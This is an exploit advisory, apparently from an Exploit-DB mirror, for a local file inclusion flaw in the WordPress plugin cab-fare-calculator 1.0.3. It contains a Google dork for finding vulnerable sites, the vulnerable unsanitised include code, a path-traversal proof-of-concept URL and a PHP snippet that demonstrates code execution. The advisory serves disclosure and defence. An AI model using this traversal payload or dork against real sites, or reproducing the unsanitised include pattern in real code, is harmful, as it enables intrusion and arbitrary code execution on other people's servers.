WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion

vendor:

cab-fare-calculator

by:

Hassan Khan Yusufzai - Splint3r7

8.8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: cab-fare-calculator

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE:

CPE: a:wordpress:wordpress_plugin:cab-fare-calculator

Metasploit:

Other Scripts:

Platforms Tested: Firefox

2022

WordPress Plugin cab-fare-calculator 1.0.3 – Local File Inclusion

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'controller' parameter of the 'tblight.php' script. A remote attacker can send a specially crafted request to the vulnerable script and execute arbitrary PHP code on the target system.

Mitigation:

The vendor recommends to update the plugin to the latest version. Additionally, the user should ensure that all input is properly sanitized before being used.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion
# Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/
# Date: 24-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/
# Version: 1.0.3
# Tested on: Firefox
# Vulnerable File: tblight.php

# Impact:

Local File Read / Code Execution

# Vulnerable Code:

```
if(!empty($_GET['controller']) && !empty($_GET['action']) &&
!empty($_GET['ajax']) && $_GET['ajax'] == 1)
{
    require_once('' . 'controllers/'.$_GET['controller'].'.php');
}
```

# Proof of concept:

http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1

# POC Code Execution:

/etc/index.php:

<?php echo "Local file read"; phpinfo(); ?>